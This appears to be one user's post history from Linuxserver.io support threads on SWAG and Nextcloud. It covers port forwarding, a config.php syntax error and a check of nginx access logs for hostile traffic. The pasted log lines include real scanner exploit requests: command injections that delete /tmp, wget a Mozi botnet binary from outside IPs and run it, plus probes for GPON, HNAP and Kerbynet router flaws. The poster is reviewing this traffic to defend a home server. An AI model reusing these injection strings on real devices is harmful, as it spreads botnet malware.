Everything posted by ZekerPixels
-
[Support] Linuxserver.io - SWAG - Secure Web Application Gateway (Nginx/PHP/Certbot/Fail2ban)
My device settings look totally different, but to me it looks like you are forwarding 180 to 180 and 4443 to 4443 instead of 80 to 180 and 443 to 4443. The scrceenshot is verry cropped so maybe its on there, but it should state the ports 80 and 443 someware in the port forward. What you can do is change the ip in the forward to your pc, and check if the ports are indeed open.
-
[Support] Linuxserver.io - SWAG - Secure Web Application Gateway (Nginx/PHP/Certbot/Fail2ban)
of course its in /appdata/swag/log/nginx/access.log I understand the bot searching for something unsecured, as long as its secured it doesnt realy do anything. But I'm trying to understand what is happening and I want to be conviced it is secured before actualy using it. And I realy want to have geo blocking working, it doesnt hurt using it and https://www.spamhaus.org/statistics/botnet-cc/ well those get blocked. But kerbynet I mentioned, turns out to be an old router exploit.
-
[Support] Linuxserver.io - SWAG - Secure Web Application Gateway (Nginx/PHP/Certbot/Fail2ban)
Hi all, Over the weekend is setup swag and nextcloud, following spaceinvaderone's guides. (https://scan.nextcloud.com/, gives all A+) I got everything working using my own domain (nexcloud.mydomain.com). I'm not a specialist but, so I'm not very confident about the security. So, I decided to let it running for about 20hrs, and check the logs and enter the ips on abuseipdb.com. I filtered all my activities out and am left with 158 lines in ngix log. Here and example: https://www.abuseipdb.com/check/74.120.14.53 https://www.abuseipdb.com/check/180.163.220.5 https://www.abuseipdb.com/check/180.163.220.68 https://www.abuseipdb.com/check/27.115.124.70 https://www.abuseipdb.com/check/192.241.215.11 Next some lines, of which non are from my ips. I understand the GET background, logo, ect. But kerbynet and wget from some ip, don't sound good. GET / HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 POST /GponForm/diag_Form?images/ HTTP/1.1 /tmp/gpon80&ipv=0 POST /boaform/admin/formLogin HTTP/1.1 400 0 - GET /portal/redlion HTTP/1.1 HEAD http://112.124.42.80:63435/ HTTP/1.1 CONNECT 112.124.42.80:443 HTTP/1.1 HEAD http://110.242.68.4/ HTTP/1.1 CONNECT 110.242.68.4:443 HTTP/1.1 POST /HNAP1/ HTTP/1.0 \x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED HEAD /robots.txt HTTP/1.0 GET /login HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 GET /actuator/health HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 OPTIONS / HTTP/1.1 HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1 HEAD / HTTP/1.0 GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1 @\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6| \x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr GET /hudson HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /config/getuser?index=0 HTTP/1.1 GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1 GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 GET / HTTP/2.0 http://baidu.com/ GET /login HTTP/2.0 http://baidu.com/ GET / HTTP/2.0 GET /login HTTP/2.0 GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0 GET /core/css/guest.css?v=c3182750-8 HTTP/2.0 GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0 GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0 GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0 GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0 GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0 GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0 GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0 GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0 GET /core/js/oc.js?v=c3182750 HTTP/2.0 GET /apps/theming/styles?v=8 HTTP/2.0 GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0 GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0 GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0 GET /core/img/loading-dark.gif HTTP/2.0 GET /core/img/actions/toggle.svg HTTP/2.0 GET /apps/theming/image/logo?v=8 HTTP/2.0 GET /csrftoken HTTP/2.0 GET /apps/theming/image/background?v=8 HTTP/2.0 GET /csrftoken HTTP/2.0 GET /apps/theming/favicon?v=8 HTTP/1.1 GET /csrftoken HTTP/2.0 Are there some obvious things I forgot to do? considering the ip locations, geo blocking wouldn't be a bad idea. I dont leave the country much, so blocking about the whole world exept 2/3 countys would probably be an option. Thanks, edit: found something on geo blocking https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/ ofc, running into issues, I'm missing something verry obvious.
-
[Support] Linuxserver.io - Nextcloud
[SOLVED] Hi all, I'm trying to setup nextcould and swag, so i can acces it from my own domain. I can't find why I don't get it working, it's probably something very simple and hopefully someone can point me into the right direction. When I try to access nexcloud in the browser via nextcloud.mydomain.com, I get: Internal Server Error The server encountered an internal error and was unable to complete your request. Please contact the server administrator if this error reappears multiple times, please include the technical details below in your report. More details can be found in the webserver log. This is the error I get from the nextcloud container, by clicking on log on the docker page: PHP Fatal error: Uncaught Error: Call to a member function getLogger() on null in /config/www/nextcloud/cron.php:162 Stack trace: } How I set it up, is of course according to the spaceinvaderone video. For setting up swag, I have the custom proxy network, port forwards and entered my own domain. This is working, the log showed getting a certificate and ends on server ready. And I made the subdomain.conf without changes form the sample, because I will also be using nextcloud.mydomain.com. Setting up nextcloud works, till the point where you acces it via your own domain. (also at this point clicking on webUI gives the same error) So I expect the config.php file, this is also the part which is differend from the video, because of swag instead of LetsEncrypt. This is the nextcloud config.php; <?php $CONFIG = array ( 'memcache.local' => '\\OC\\Memcache\\APCu', 'datadirectory' => '/data', 'instanceid' => '###', 'passwordsalt' => '###', 'secret' => '###', 'trusted_domains' => 'trusted_proxies' => ['swag'], array ( 0 => '10.10.10.10:444', 1 => 'nextcloud.mydomain.com', ), 'overwrite.cli.url' => 'https://nextcloud.mydomain.com/', 'overwritehost' => 'nextcloud.mydomain.com', 'overwriteprotocol' => 'https', 'dbtype' => 'mysql', 'version' => '20.0.6.1', 'dbname' => 'db name from mariadb', 'dbhost' => '10.10.10.10:3306', 'dbport' => '', 'dbtableprefix' => 'oc_', 'mysql.utf8mb4' => true, 'dbuser' => 'user name from mariadb', 'dbpassword' => 'password', 'installed' => true, ); Thanks, Edit: I found some post on a russian forum, that mentiones the same error, pointing to a syntax error in the nextcloud config file. I copied and modified the file using nano in the terminal, this should be good, rigth? I will try to use notepad++ to see if it makes a differnce. Edit: Omg, I'm stupid. Look where I placed the trusted proxies, it fucked up the domains array.